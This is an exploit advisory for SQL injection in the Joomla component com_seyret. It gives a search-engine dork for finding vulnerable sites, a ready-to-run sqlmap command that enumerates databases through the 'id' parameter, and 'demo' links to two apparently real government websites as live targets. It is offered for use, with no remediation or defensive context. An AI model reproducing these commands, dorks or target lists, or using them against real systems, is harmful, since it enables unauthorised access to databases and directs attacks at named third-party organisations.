# Exploit Title : Joomla com_seyret,SQL Injection
# Exploit Author : mr.nawaf
# Dork : allinurl: "index.php?option=com_seyret"
# Date: 2016/07/27
# video : https://www.youtube.com/watch?v=ffWmy3NRffQ&feature=youtu.be
_____________________________________
#Exploit:
exploit using sqlmap
sqlmap.py -u http://www.localhost.com/index.php?option=com_seyret&Itemid=1&task=videodirectlink&id=1 --dbs
# demo :
http://www.detran.pe.gov.br/index.php?option=com_seyret&Itemid=258&task=videodirectlink&id=1
http://www.zakat-chamber.gov.sd/arabic/index.php?option=com_seyret&Itemid=0&task=videodirectlink&id=44
===
# Discovered by : mr.nawaf
# twitter :nawaf_root
# youtube : https://www.youtube.com/channel/UCG7jXOjwbcVqO8tXYnONrgQ